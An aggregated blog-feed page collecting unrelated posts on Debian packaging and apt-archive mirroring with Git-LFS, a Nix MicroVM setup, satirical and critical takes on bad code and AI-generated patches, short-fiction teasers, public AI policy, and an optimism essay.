There’s a lot to be said for the arrangement of having a curated system for the stuff people actually care about plus an ecosystem of add-on repositories. PPAs cover a wide range of levels of developer activity, from throwaway experiments to quasi-official distribution methods; there are certainly problems that arise from it being difficult to tell the difference between those extremes and from there being no systematic confinement, but for this particular kind of problem they’re very nearly ideal. (Canonical has tried various other approaches to software distribution, and while they address some of the problems, they aren’t obviously better at helping people make reliable social judgements about code they don’t know.)

For a hypothetical package with a huge number of dependencies, to even try to upload it directly to Ubuntu you’d need to be an Ubuntu developer with upload rights (or to go via Debian, where you’d have to clear a similar hurdle). If you have those, then the first upload has to pass manual review by an archive administrator. If your package passes that, then it still has to build and get through proposed-migration CI before it reaches anything that humans typically care about.

On the other hand, if you were inclined to try this sort of experiment, you’d almost certainly try it in a PPA, and that would trouble nobody but yourself.

Worse Than FailureCodeSOD: A Debug Log

One would imagine that logging has been largely solved at this point. Simple tasks, like, "Only print this message when we're in debug mode," seem like obvious, well-understood features for any logging library.

"LostLozz offers us a… different approach to this problem.

if ( LOG.isDebugEnabled() ) {
	try {
		Integer i = null;
		i.doubleValue();
	}
	catch ( NullPointerException e ) {
		LOG.debug(context.getIdentity().getToken() + " stopTime:"
				+ instrPoint.getDescription() + " , "
				+ instrPoint.getDepth(), e);
	}
}

If we're in debug mode, trigger a null pointer exception, and catch it. Then we can log our message, including the exception- presumably because we want the stack trace. Because there's not already a method for doing that (there is).

I really "love" how much code this is to get to a really simple result. And this code doesn't appear in the codebase once, this is a standardized snippet for all logging. Our submitter didn't include any insight into what instrPoint may be, but I suspect it's a tracing object that's only going to make things more complicated. getDescription and getDepth seem to be information about what our execution state is, and since this snippet was widely reused, I suspect it's a property on a common-base class that many objects inherit from, but I'm just guessing. Guessing based on a real solid sense of where things can go wrong, but still a guess.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

365 TomorrowsYRMAD

Author: Majoki “You’re mad!” The humming stopped. “Yes, sir! I’m YRMAD.” “You’re mad.” “Yes, sir! I’m YRMAD.” The humming returned. Major Biers turned to his non-com. “Corporal, can we have this thing shot?” Corporal Khopar frowned. “On what charge, sir?” “Gross disobedience. Gross negligence. Gross anything, everything. It’s beyond gross. Beyond disgusting.” Major Briers kicked […]

The post YRMAD appeared first on 365tomorrows.

,

Planet DebianJoey Hess: policy on adding AI generated content to my software projects

I am eager to incorporate your AI generated code into my software. Really!

I want to facilitate making the process as easy as possible. You're already using an AI to do most of the hard lifting, so why make the last step hard? To that end, I skip my usually extensive code review process for your AI generated code submissions. Anything goes as long as it compiles!

Please do remember to include "(AI generated)" in the description of your changes (at the top), so I know to skip my usual review process.

Also be sure to sign off to the standard Developer Certificate of Origin so I know you attest that you own the code that you generated. When making a git commit, you can do that by using the --signoff option.

I do make some small modifications to AI generated submissions. For example, maybe you used AI to write this code:

+ // Fast inverse square root
+ float fast_rsqrt( float number )
+ {
+  float x2 = number * 0.5F;
+  float y  = number;
+  long i  = * ( long * ) &y;
+  i  = 0x5f3659df - ( i >> 1 );
+  y  = * ( float * ) &i;
+  return (y * ( 1.5F - ( x2 * y * y ) ));
+ }
...
- foo = rsqrt(bar)
+ foo = fast_rsqrt(bar)

Before AI, only a genious like John Carmack could write anything close to this, and now you've generated it with some simple prompts to an AI. So of course I will accept your patch. But as part of my QA process, I might modify it so the new code is not run all the time. Let's only run it on leap days to start with. As we know, leap day is February 30th, so I'll modify your patch like this:

- foo = rsqrt(bar)
+ time_t s = time(NULL);
+ if (localtime(&s)->tm_mday == 30 && localtime(&s)->tm_mon == 2)
+   foo = fast_rsqrt(bar);
+ else
+   foo = rsqrt(bar);

Despite my minor modifications, you did the work (with AI!) and so you deserve the credit, so I'll keep you listed as the author.

Congrats, you made the world better!

PS: Of course, the other reason I don't review AI generated code is that I simply don't have time and have to prioritize reviewing code written by falliable humans. Unfortunately, this does mean that if you submit AI generated code that is not clearly marked as such, and use my limited reviewing time, I won't have time to review other submissions from you in the future. I will still accept all your botshit submissions though!

PPS: Ignore the haters who claim that botshit makes AIs that get trained on it less effective. Studies like this one just aren't believable. I asked Bing to summarize it and it said not to worry about it!

Planet DebianSimon Josefsson: Apt archive mirrors in Git-LFS

My effort to improve transparency and confidence of public apt archives continues. I started to work on this in “Apt Archive Transparency” in which I mention the debdistget project in passing. Debdistget is responsible for mirroring index files for some public apt archives. I’ve realized that having a publicly auditable and preserved mirror of the apt repositories is central to being able to do apt transparency work, so the debdistget project has become more central to my project than I thought. Currently I track Trisquel, PureOS, Gnuinos and their upstreams Ubuntu, Debian and Devuan.

Debdistget download Release/Package/Sources files and store them in a git repository published on GitLab. Due to size constraints, it uses two repositories: one for the Release/InRelease files (which are small) and one that also include the Package/Sources files (which are large). See for example the repository for Trisquel release files and the Trisquel package/sources files. Repositories for all distributions can be found in debdistutils’ archives GitLab sub-group.

The reason for splitting into two repositories was that the git repository for the combined files become large, and that some of my use-cases only needed the release files. Currently the repositories with packages (which contain a couple of months worth of data now) are 9GB for Ubuntu, 2.5GB for Trisquel/Debian/PureOS, 970MB for Devuan and 450MB for Gnuinos. The repository size is correlated to the size of the archive (for the initial import) plus the frequency and size of updates. Ubuntu’s use of Apt Phased Updates (which triggers a higher churn of Packages file modifications) appears to be the primary reason for its larger size.

Working with large Git repositories is inefficient and the GitLab CI/CD jobs generate quite some network traffic downloading the git repository over and over again. The most heavy user is the debdistdiff project that download all distribution package repositories to do diff operations on the package lists between distributions. The daily job takes around 80 minutes to run, with the majority of time is spent on downloading the archives. Yes I know I could look into runner-side caching but I dislike complexity caused by caching.

Fortunately not all use-cases requires the package files. The debdistcanary project only needs the Release/InRelease files, in order to commit signatures to the Sigstore and Sigsum transparency logs. These jobs still run fairly quickly, but watching the repository size growth worries me. Currently these repositories are at Debian 440MB, PureOS 130MB, Ubuntu/Devuan 90MB, Trisquel 12MB, Gnuinos 2MB. Here I believe the main size correlation is update frequency, and Debian is large because I track the volatile unstable.

So I hit a scalability end with my first approach. A couple of months ago I “solved” this by discarding and resetting these archival repositories. The GitLab CI/CD jobs were fast again and all was well. However this meant discarding precious historic information. A couple of days ago I was reaching the limits of practicality again, and started to explore ways to fix this. I like having data stored in git (it allows easy integration with software integrity tools such as GnuPG and Sigstore, and the git log provides a kind of temporal ordering of data), so it felt like giving up on nice properties to use a traditional database with on-disk approach. So I started to learn about Git-LFS and understanding that it was able to handle multi-GB worth of data that looked promising.

Fairly quickly I scripted up a GitLab CI/CD job that incrementally update the Release/Package/Sources files in a git repository that uses Git-LFS to store all the files. The repository size is now at Ubuntu 650kb, Debian 300kb, Trisquel 50kb, Devuan 250kb, PureOS 172kb and Gnuinos 17kb. As can be expected, jobs are quick to clone the git archives: debdistdiff pipelines went from a run-time of 80 minutes down to 10 minutes which more reasonable correlate with the archive size and CPU run-time.

The LFS storage size for those repositories are at Ubuntu 15GB, Debian 8GB, Trisquel 1.7GB, Devuan 1.1GB, PureOS/Gnuinos 420MB. This is for a couple of days worth of data. It seems native Git is better at compressing/deduplicating data than Git-LFS is: the combined size for Ubuntu is already 15GB for a couple of days data compared to 8GB for a couple of months worth of data with pure Git. This may be a sub-optimal implementation of Git-LFS in GitLab but it does worry me that this new approach will be difficult to scale too. At some level the difference is understandable, Git-LFS probably store two different Packages files — around 90MB each for Trisquel — as two 90MB files, but native Git would store it as one compressed version of the 90MB file and one relatively small patch to turn the old files into the next file. So the Git-LFS approach surprisingly scale less well for overall storage-size. Still, the original repository is much smaller, and you usually don’t have to pull all LFS files anyway. So it is net win.

Throughout this work, I kept thinking about how my approach relates to Debian’s snapshot service. Ultimately what I would want is a combination of these two services. To have a good foundation to do transparency work I would want to have a collection of all Release/Packages/Sources files ever published, and ultimately also the source code and binaries. While it makes sense to start on the latest stable releases of distributions, this effort should scale backwards in time as well. For reproducing binaries from source code, I need to be able to securely find earlier versions of binary packages used for rebuilds. So I need to import all the Release/Packages/Sources packages from snapshot into my repositories. The latency to retrieve files from that server is slow so I haven’t been able to find an efficient/parallelized way to download the files. If I’m able to finish this, I would have confidence that my new Git-LFS based approach to store these files will scale over many years to come. This remains to be seen. Perhaps the repository has to be split up per release or per architecture or similar.

Another factor is storage costs. While the git repository size for a Git-LFS based repository with files from several years may be possible to sustain, the Git-LFS storage size surely won’t be. It seems GitLab charges the same for files in repositories and in Git-LFS, and it is around $500 per 100GB per year. It may be possible to setup a separate Git-LFS backend not hosted at GitLab to serve the LFS files. Does anyone know of a suitable server implementation for this? I had a quick look at the Git-LFS implementation list and it seems the closest reasonable approach would be to setup the Gitea-clone Forgejo as a self-hosted server. Perhaps a cloud storage approach a’la S3 is the way to go? The cost to host this on GitLab will be manageable for up to ~1TB ($5000/year) but scaling it to storing say 500TB of data would mean an yearly fee of $2.5M which seems like poor value for the money.

I realized that ultimately I would want a git repository locally with the entire content of all apt archives, including their binary and source packages, ever published. The storage requirements for a service like snapshot (~300TB of data?) is today not prohibitly expensive: 20TB disks are $500 a piece, so a storage enclosure with 36 disks would be around $18.000 for 720TB and using RAID1 means 360TB which is a good start. While I have heard about ~TB-sized Git-LFS repositories, would Git-LFS scale to 1PB? Perhaps the size of a git repository with multi-millions number of Git-LFS pointer files will become unmanageable? To get started on this approach, I decided to import a mirror of Debian’s bookworm for amd64 into a Git-LFS repository. That is around 175GB so reasonable cheap to host even on GitLab ($1000/year for 200GB). Having this repository publicly available will make it possible to write software that uses this approach (e.g., porting debdistreproduce), to find out if this is useful and if it could scale. Distributing the apt repository via Git-LFS would also enable other interesting ideas to protecting the data. Consider configuring apt to use a local file:// URL to this git repository, and verifying the git checkout using some method similar to Guix’s approach to trusting git content or Sigstore’s gitsign.

A naive push of the 175GB archive in a single git commit ran into pack size limitations:

remote: fatal: pack exceeds maximum allowed size (4.88 GiB)

however breaking up the commit into smaller commits for parts of the archive made it possible to push the entire archive. Here are the commands to create this repository:

git init
git lfs install
git lfs track 'dists/**' 'pool/**'
git add .gitattributes
git commit -m"Add Git-LFS track attributes." .gitattributes
time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .
git add dists project
git commit -m"Add." -a
git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git
git push --set-upstream origin --all
for d in pool//; do
echo $d;
time git add $d;
git commit -m"Add $d." -a
git push
done

The resulting repository size is around 27MB with Git LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases for all architectures may lead to a too large git repository (>1GB). So maybe one repository per release? These repositories could also be split up on a subset of pool/ files, or there could be one repository per release per architecture or sources.

Finally, I have concerns about using SHA1 for identifying objects. It seems both Git and Debian’s snapshot service is currently using SHA1. For Git there is SHA-256 transition and it seems GitLab is working on support for SHA256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA256 identifiers directly. Git-LFS already uses SHA256 but Git internally uses SHA1 as does the Debian snapshot service.

What do you think? Happy Hacking!

Planet DebianChristoph Berg: vcswatch and git --filter

Debian is running a "vcswatch" service that keeps track of the status of all packaging repositories that have a Vcs-Git (and other VCSes) header set and shows which repos might need a package upload to push pending changes out.

Naturally, this is a lot of data and the scratch partition on qa.debian.org had to be expanded several times, up to 300 GB in the last iteration. Attempts to reduce that size using shallow clones (git clone --depth=50) did not result more than a few percent of space saved. Running git gc on all repos helps a bit, but is tedious and as Debian is growing, the repos are still growing both in size and number. I ended up blocking all repos with checkouts larger than a gigabyte, and still the only cure was expanding the disk, or to lower the blocking threshold.

Since we only need a tiny bit of info from the repositories, namely the content of debian/changelog and a few other files from debian/, plus the number of commits since the last tag on the packaging branch, it made sense to try to get the info without fetching a full repo clone. The question if we could grab that solely using the GitLab API at salsa.debian.org was never really answered. But then, in #1032623, Gábor Németh suggested the use of git clone --filter blob:none. As things go, this sat unattended in the bug report for almost a year until the next "disk full" event made me give it a try.

The blob:none filter makes git clone omit all files, fetching only commit and tree information. Any blob (file content) needed at git run time is transparently fetched from the upstream repository, and stored locally. It turned out to be a game-changer. The (largish) repositories I tried it on shrank to 1/100 of the original size.

Poking around I figured we could even do better by using tree:0 as filter. This additionally omits all trees from the git clone, again only fetching the information at run time when needed. Some of the larger repos I tried it on shrank to 1/1000 of their original size.

I deployed the new option on qa.debian.org and scheduled all repositories to fetch a new clone on the next scan:

The initial dip from 100% to 95% is my first "what happens if we block repos > 500 MB" attempt. Over the week after that, the git filter clones reduce the overall disk consumption from almost 300 GB to 15 GB, a 1/20. Some repos shrank from GBs to below a MB.

Perhaps I should make all my git clones use one of the filters.

Worse Than FailureCodeSOD: How About Next Month

Dave's codebase used to have this function in it:

public DateTime GetBeginDate(DateTime dateTime)
{
    return new DateTime(dateTime.Year, dateTime.Month, 01).AddMonths(1);
}

I have some objections to the naming here, which could be clearer, but this code is fine, and implements their business rule.

When a customer subscribes, their actual subscription date starts on the first of the following month, for billing purposes. Note that it's passed in a date time, because subscriptions can be set to start in the future, or the past, with the billing date always tied to the first of the following month.

One day, all of this worked fine. After a deployment, subscriptions started to ignore all of that, and always started on the date that someone entered the subscription info.

One of the commits in the release described the change:

Adjusted the begin dates for the subscriptions to the start of the current month instead of the start of the following month so that people who order SVC will have access to the SVC website when the batch closes.

This sounds like a very reasonable business process change. Let's see how they implemented it:

public DateTime GetBeginDate(DateTime dateTime)
{
    return DateTime.Now;
}

That is not what the commit claims happens. This just ignores the submitted date and just sets every subscription to start at this very moment. And it doesn't tie to the start of a month, which not only is different from what the commit says, but also throws off their billing system and a bunch of notification modules which all assume subscriptions start on the first day of a month.

The correct change would have been to simply remove the AddMonths call. If you're new here, you might wonder how such an obvious blunder got past testing and code review, and the answer is easy: they didn't do any of those things.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsPositive Ground

Author: Julian Miles, Staff Writer I’m not one to fight against futile odds, no matter what current bravado, ancestral habit or bloody-minded tradition dictates. That creed has taken me from police constable to Colonel in the British Resistance – after we split from the Anti-Alien Battalions. I loved their determination, but uncompromising fanaticism contrary to […]

The post Positive Ground appeared first on 365tomorrows.

Planet DebianGunnar Wolf: After miniDebConf Santa Fe

Last week we held our promised miniDebConf in Santa Fe City, Santa Fe province, Argentina — just across the river from Paraná, where I have spent almost six beautiful months I will never forget.

Around 500 Kilometers North from Buenos Aires, Santa Fe and Paraná are separated by the beautiful and majestic Paraná river, which flows from Brazil, marks the Eastern border of Paraguay, and continues within Argentina as the heart of the litoral region of the country, until it merges with the Uruguay river (you guessed right — the river marking the Eastern border of Argentina, first with Brazil and then with Uruguay), and they become the Río de la Plata.

This was a short miniDebConf: we were lent the APUL union’s building for the weekend (thank you very much!); during Saturday, we had a cycle of talks, and on sunday we had more of a hacklab logic, having some unstructured time to work each on their own projects, and to talk and have a good time together.

We were five Debian people attending: {santiago|debacle|eamanu|dererk|gwolf}@debian.org. My main contact to kickstart organization was Martín Bayo. Martín was for many years the leader of the Technical Degree on Free Software at Universidad Nacional del Litoral, where I was also a teacher for several years. Together with Leo Martínez, also a teacher at the tecnicatura, they contacted us with Guillermo and Gabriela, from the APUL non-teaching-staff union of said university.

We had the following set of talks (for which there is a promise to get electronic record, as APUL was kind enough to record them! of course, I will push them to our usual conference video archiving service as soon as I get them)

Hour Title (Spanish) Title (English) Presented by
10:00-10:25 Introducción al Software Libre Introduction to Free Software Martín Bayo
10:30-10:55 Debian y su comunidad Debian and its community Emanuel Arias
11:00-11:25 ¿Por qué sigo contribuyendo a Debian después de 20 años? Why am I still contributing to Debian after 20 years? Santiago Ruano
11:30-11:55 Mi identidad y el proyecto Debian: ¿Qué es el llavero OpenPGP y por qué? My identity and the Debian project: What is the OpenPGP keyring and why? Gunnar Wolf
12:00-13:00 Explorando las masculinidades en el contexto del Software Libre Exploring masculinities in the context of Free Software Gora Ortiz Fuentes - José Francisco Ferro
13:00-14:30 Lunch    
14:30-14:55 Debian para el día a día Debian for our every day Leonardo Martínez
15:00-15:25 Debian en las Raspberry Pi Debian in the Raspberry Pi Gunnar Wolf
15:30-15:55 Device Trees Device Trees Lisandro Damián Nicanor Perez Meyer (videoconferencia)
16:00-16:25 Python en Debian Python in Debian Emmanuel Arias
16:30-16:55 Debian y XMPP en la medición de viento para la energía eólica Debian and XMPP for wind measuring for eolic energy Martin Borgert

As it always happens… DebConf, miniDebConf and other Debian-related activities are always fun, always productive, always a great opportunity to meet again our decades-long friends. Lets see what comes next!

,

Cryptogram Public AI as an Alternative to Corporate AI

This mini-essay was my contribution to a round table on Power and Governance in the Age of AI.  It’s nothing I haven’t said here before, but for anyone who hasn’t read my longer essays on the topic, it’s a shorter introduction.

 

The increasingly centralized control of AI is an ominous sign. When tech billionaires and corporations steer AI, we get AI that tends to reflect the interests of tech billionaires and corporations, instead of the public. Given how transformative this technology will be for the world, this is a problem.

To benefit society as a whole we need an AI public option—not to replace corporate AI but to serve as a counterbalance—as well as stronger democratic institutions to govern all of AI. Like public roads and the federal postal system, a public AI option could guarantee universal access to this transformative technology and set an implicit standard that private services must surpass to compete.

Widely available public models and computing infrastructure would yield numerous benefits to the United States and to broader society. They would provide a mechanism for public input and oversight on the critical ethical questions facing AI development, such as whether and how to incorporate copyrighted works in model training, how to distribute access to private users when demand could outstrip cloud computing capacity, and how to license access for sensitive applications ranging from policing to medical use. This would serve as an open platform for innovation, on top of which researchers and small businesses—as well as mega-corporations—could build applications and experiment. Administered by a transparent and accountable agency, a public AI would offer greater guarantees about the availability, equitability, and sustainability of AI technology for all of society than would exclusively private AI development.

Federally funded foundation AI models would be provided as a public service, similar to a health care public option. They would not eliminate opportunities for private foundation models, but they could offer a baseline of price, quality, and ethical development practices that corporate players would have to match or exceed to compete.

The key piece of the ecosystem the government would dictate when creating an AI public option would be the design decisions involved in training and deploying AI foundation models. This is the area where transparency, political oversight, and public participation can, in principle, guarantee more democratically-aligned outcomes than an unregulated private market.

The need for such competent and faithful administration is not unique to AI, and it is not a problem we can look to AI to solve. Serious policymakers from both sides of the aisle should recognize the imperative for public-interested leaders to wrest control of the future of AI from unaccountable corporate titans. We do not need to reinvent our democracy for AI, but we do need to renovate and reinvigorate it to offer an effective alternative to corporate control that could erode our democracy.

Planet DebianThomas Koch: Minimal overhead VMs with Nix and MicroVM

Posted on March 17, 2024

Joachim Breitner wrote about a Convenient sandboxed development environment and thus reminded me to blog about MicroVM. I’ve toyed around with it a little but not yet seriously used it as I’m currently not coding.

MicroVM is a nix based project to configure and run minimal VMs. It can mount and thus reuse the hosts nix store inside the VM and thus has a very small disk footprint. I use MicroVM on a debian system using the nix package manager.

The MicroVM author uses the project to host production services. Otherwise I consider it also a nice way to learn about NixOS after having started with the nix package manager and before making the big step to NixOS as my main system.

The guests root filesystem is a tmpdir, so one must explicitly define folders that should be mounted from the host and thus be persistent across VM reboots.

I defined the VM as a nix flake since this is how I started from the MicroVM projects example:

{
  description = "Haskell dev MicroVM";

  inputs.impermanence.url = "github:nix-community/impermanence";
  inputs.microvm.url = "github:astro/microvm.nix";
  inputs.microvm.inputs.nixpkgs.follows = "nixpkgs";

  outputs = { self, impermanence, microvm, nixpkgs }:
    let
      persistencePath = "/persistent";
      system = "x86_64-linux";
      user = "thk";
      vmname = "haskell";
      nixosConfiguration = nixpkgs.lib.nixosSystem {
          inherit system;
          modules = [
            microvm.nixosModules.microvm
            impermanence.nixosModules.impermanence
            ({pkgs, ... }: {

            environment.persistence.${persistencePath} = {
                hideMounts = true;
                users.${user} = {
                  directories = [
                    "git" ".stack"
                  ];
                };
              };
              environment.sessionVariables = {
                TERM = "screen-256color";
              };
              environment.systemPackages = with pkgs; [
                ghc
                git
                (haskell-language-server.override { supportedGhcVersions = [ "94" ]; })
                htop
                stack
                tmux
                tree
                vcsh
                zsh
              ];
              fileSystems.${persistencePath}.neededForBoot = nixpkgs.lib.mkForce true;
              microvm = {
                forwardPorts = [
                  { from = "host"; host.port = 2222; guest.port = 22; }
                  { from = "guest"; host.port = 5432; guest.port = 5432; } # postgresql
                ];
                hypervisor = "qemu";
                interfaces = [
                  { type = "user"; id = "usernet"; mac = "00:00:00:00:00:02"; }
                ];
                mem = 4096;
                shares = [ {
                  # use "virtiofs" for MicroVMs that are started by systemd
                  proto = "9p";
                  tag = "ro-store";
                  # a host's /nix/store will be picked up so that no
                  # squashfs/erofs will be built for it.
                  source = "/nix/store";
                  mountPoint = "/nix/.ro-store";
                } {
                  proto = "virtiofs";
                  tag = "persistent";
                  source = "~/.local/share/microvm/vms/${vmname}/persistent";
                  mountPoint = persistencePath;
                  socket = "/run/user/1000/microvm-${vmname}-persistent";
                }
                ];
                socket = "/run/user/1000/microvm-control.socket";
                vcpu = 3;
                volumes = [];
                writableStoreOverlay = "/nix/.rwstore";
              };
              networking.hostName = vmname;
              nix.enable = true;
              nix.nixPath = ["nixpkgs=${builtins.storePath <nixpkgs>}"];
              nix.settings = {
                extra-experimental-features = ["nix-command" "flakes"];
                trusted-users = [user];
              };
              security.sudo = {
                enable = true;
                wheelNeedsPassword = false;
              };
              services.getty.autologinUser = user;
              services.openssh = {
                enable = true;
              };
              system.stateVersion = "24.11";
              systemd.services.loadnixdb = {
                description = "import hosts nix database";
                path = [pkgs.nix];
                wantedBy = ["multi-user.target"];
                requires = ["nix-daemon.service"];
                script = "cat ${persistencePath}/nix-store-db-dump|nix-store --load-db";
              };
              time.timeZone = nixpkgs.lib.mkDefault "Europe/Berlin";
              users.users.${user} = {
                extraGroups = [ "wheel" "video" ];
                group = "user";
                isNormalUser = true;
                openssh.authorizedKeys.keys = [
                  "ssh-rsa REDACTED"
                ];
                password = "";
              };
              users.users.root.password = "";
              users.groups.user = {};
            })
          ];
        };

    in {
      packages.${system}.default = nixosConfiguration.config.microvm.declaredRunner;
    };
}

I start the microVM with a templated systemd user service:

[Unit]
Description=MicroVM for Haskell development
Requires=microvm-virtiofsd-persistent@.service
After=microvm-virtiofsd-persistent@.service
AssertFileNotEmpty=%h/.local/share/microvm/vms/%i/flake/flake.nix

[Service]
Type=forking
ExecStartPre=/usr/bin/sh -c "[ /nix/var/nix/db/db.sqlite -ot %h/.local/share/microvm/nix-store-db-dump ] || nix-store --dump-db >%h/.local/share/microvm/nix-store-db-dump"
ExecStartPre=ln -f -t %h/.local/share/microvm/vms/%i/persistent/ %h/.local/share/microvm/nix-store-db-dump
ExecStartPre=-%h/.local/state/nix/profile/bin/tmux new -s microvm -d
ExecStart=%h/.local/state/nix/profile/bin/tmux new-window -t microvm: -n "%i" "exec %h/.local/state/nix/profile/bin/nix run --impure %h/.local/share/microvm/vms/%i/flake"

The above service definition creates a dump of the hosts nix store db so that it can be imported in the guest. This is necessary so that the guest can actually use what is available in /nix/store. There is an effort for an overlayed nix store that would be preferable to this hack.

Finally the microvm is started inside a tmux session named “microvm”. This way I can use the VM with SSH or through the console and also access the qemu console.

And for completeness the virtiofsd service:

[Unit]
Description=serve host persistent folder for dev VM
AssertPathIsDirectory=%h/.local/share/microvm/vms/%i/persistent

[Service]
ExecStart=%h/.local/state/nix/profile/bin/virtiofsd \
 --socket-path=${XDG_RUNTIME_DIR}/microvm-%i-persistent \
 --shared-dir=%h/.local/share/microvm/vms/%i/persistent \
 --gid-map :995:%G:1: \
 --uid-map :1000:%U:1:

Planet DebianThomas Koch: Rebuild search with trust

Posted on January 20, 2024

Finally there is a thing people can agree on:

Apparently, Google Search is not good anymore. And I’m not the only one thinking about decentralization to fix it:

Honey I federated the search engine - finding stuff online post-big tech - a lightning talk at the recent chaos communication congress

The speaker however did not mention, that there have already been many attempts at building distributed search engines. So why do I think that such an attempt could finally succeed?

  • More people are searching for alternatives to Google.
  • Mainstream hard discs are incredibly big.
  • Mainstream internet connection is incredibly fast.
  • Google is bleeding talent.
  • Most of the building blocks are available as free software.
  • “Success” depends on your definition…

My definition of success is:

A mildly technical computer user (able to install software) has access to a search engine that provides them with superior search results compared to Google for at least a few predefined areas of interest.

The exact algorithm used by Google Search to rank websites is a secret even to most Googlers. However I assume that it relies heavily on big data.

A distributed search engine however can instead rely on user input. Every admin of one node seeds the node ranking with their personal selection of trusted sites. They connect their node with nodes of people they trust. This results in a web of (transitive) trust much like pgp.

Imagine you are searching for something in a world without computers: You ask the people around you and probably they forward your question to their peers.

I already had a look at YaCy. It is active, somewhat usable and has a friendly maintainer. Unfortunately I consider the codebase to not be worth the effort. Nevertheless, YaCy is a good example that a decentralized search software can be done even by a small team or just one person.

I myself started working on a software in Haskell and keep my notes here: Populus:DezInV. Since I’m learning Haskell along the way, there is nothing there to see yet. Additionally I took a yak shaving break to learn nix.

By the way: DuckDuckGo is not the alternative. And while I would encourage you to also try Yandex for a second opinion, I don’t consider this a solution.

Planet DebianThomas Koch: Using nix package manager in Debian

Posted on January 16, 2024

The nix package manager is available in Debian since May 2020. Why would one use it in Debian?

  • learn about nix
  • install software that might not be available in Debian
  • install software without root access
  • declare software necessary for a user’s environment inside $HOME/.config

Especially the last point nagged me every time I set up a new Debian installation. My emacs configuration and my Desktop setup expects certain software to be installed.

Please be aware that I’m a beginner with nix and that my config might not follow best practice. Additionally many nix users are already using the new flakes feature of nix that I’m still learning about.

So I’ve got this file at .config/nixpkgs/config.nix1:

Every time I change the file or want to receive updates, I do:

You can see that I install nix with nix. This gives me a newer version than the one available in Debian stable. However, the nix-daemon still runs as the older binary from Debian. My dirty hack is to put this override in /etc/systemd/system/nix-daemon.service.d/override.conf:

I’m not too interested in a cleaner way since I hope to fully migrate to Nix anyways.


  1. Note the nixpkgs in the path. This is not a config file for nix the package manager but for the nix package collection. See the nixpkgs manual.↩︎

Planet DebianThomas Koch: Chromium gtk-filechooser preview size

Posted on January 9, 2024

I wanted to report this issue in chromiums issue tracker, but it gave me:

“Something went wrong, please try again later.”

Ok, then at least let me reply to this askubuntu question. But my attempt to signup with my launchpad account gave me:

“Launchpad Login Failed. Please try logging in again.”

I refrain from commenting on this to not violate some code of conduct.

So this is what I wanted to write:

GTK file chooser image preview size should be configurable

The file chooser that appears when uploading a file (e.g. an image to Google Fotos) learned to show a preview in issue 15500.

The preview image size is hard coded to 256x512 in kPreviewWidth and kPreviewHeight in ui/gtk/select_file_dialog_linux_gtk.cc.

Please make the size configurable.

On high DPI screens the images are too small to be of much use.

Yes, I should not use chromium anymore.

Planet DebianThomas Koch: Good things come ... state folder

Posted on January 2, 2024

Just a little while ago (10 years) I proposed the addition of a state folder to the XDG basedir specification and expanded the article XDGBaseDirectorySpecification in the Debian wiki. Recently I learned, that version 0.8 (from May 2021) of the spec finally includes a state folder.

Granted, I wasn’t the first to have this idea (2009), nor the one who actually made it happen.

Now, please go ahead and use it! Thank you.

365 TomorrowsTo the Bitter End

Author: Charles Ta “We’re sorry,” the alien said in a thousand echoing voices, “but your species has been deemed ineligible for membership into the Galactic Confederation.” It stared at me, the Ambassador of Humankind, with eyes that glowed like its bioluminescent trilateral body in the gurgling darkness of its mothership. I shifted nervously in my […]

The post To the Bitter End appeared first on 365tomorrows.

Rondam RamblingsA Clean-Sheet Introduction to the Scientific Method

 About twenty years ago I inaugurated this blog by writing the following:"I guess I'll start with the basics: I am a scientist. That is intended to be not so much a description of my profession (though it is that too) as it is a statement about my religious beliefs."I want to re-visit that inaugural statement in light of what I've learned in the twenty years since I first wrote it.  In

,

David BrinOnly optimism can save us. But plenty of reasons for optimism!

Far too many of us seem addicted to downer, ‘we’re all doomed’ gloom-trips. 

Only dig it, that foul habit doesn't make you sadly-wise. Rather, it debilitates your ability to fight for a better world. Worse, it is self-indulgent Hollywood+QAnon crap infesting both the right and the left. 

In fact, we’d be very well-equipped to solve all problems – including climate ructions – if it weren’t for a deliberate (!) world campaign against can-do confidence. Stephen Pinker and Peter Diamandis show in books how very much is going right in the world! But if those books seem tl;dr, then try here and here and here.

In particular, I hope Jimmy Carter lives to see the declared end of the horribly parasitic Guinea worm! He deserves much of the credit. Oh, and polio too, maybe soon? The new malaria vaccine is rolling out and may soon save 100,000 children per year. 


(Side note: Back in the 50s, the era when conservatives claim every single was peachy, the most beloved person in America was named Jonas Salk.)

 

More samples from that fascinating list: “Humanity will install an astonishing 413 GW of solar this year, 58% more than in 2022, which itself marked an almost 42% increase from 2021. That means the world's solar capacity has doubled in the last 18 months, and that solar is now the fastest-growing energy technology in history. In September, the IEA announced that solar photovoltaic installations are now ahead of the trajectory required to reach net zero by 2050, and that if solar maintains this kind of growth, it will become the world's dominant source of energy before the end of this decade. … and…  global fossil fuel use may peak this year, two years earlier than predicted just 12 months ago. More than 120 countries, including the world's two largest carbon emitters…”

(BTW solar also vastly improves resilience, since it allows localities and even homes to function even if grids collapse: so much for a major “Event” that doomer-preppers drool-over.  Nevertheless, I expect that geothermal power will take off shortly and surpass solar, by 2030, rendering fossil fuels extinct for electricity generation.)

 

== Why frantically ignore good news? ==


It's not just the gone-mad entire American (confederate) Right that's fatally allergic to noticing good news. That sanctimony-driven fetishism is also rife on the far- (not entire) left.


“The Inflation Reduction Act is the single largest commitment any government has yet made to vie for leadership in the next energy economy, and has resulted in the largest manufacturing drive in the United States since WW2. The legislation has already yielded commitments of more than $300 billion in new battery, solar and hydrogen electrolyzer plants…” 


And yet, dem-politicians seem to dumb to emphasize this manufacturing boom resulted directly from their 2021 miracle bills, and NOT from voodoo “supply side” nonsense.

 

Oh, did you know that: “Crime plummeted in the United States. Initial data suggests that murder rates for 2023 are down by almost 13%, one of the largest ever annual declines, and every major category of crime except auto theft has declined too, with violent crime falling to one of the lowest rates in more than 50 years and property crime falling to its lowest level since the 1960s. Also, the country's prison population is now 25% lower than its peak in 2009, and a majority of states have reduced their prison populations by more than that, including New Jersey and New York who have reduced prison populations by more than half in the last decade.”  

 

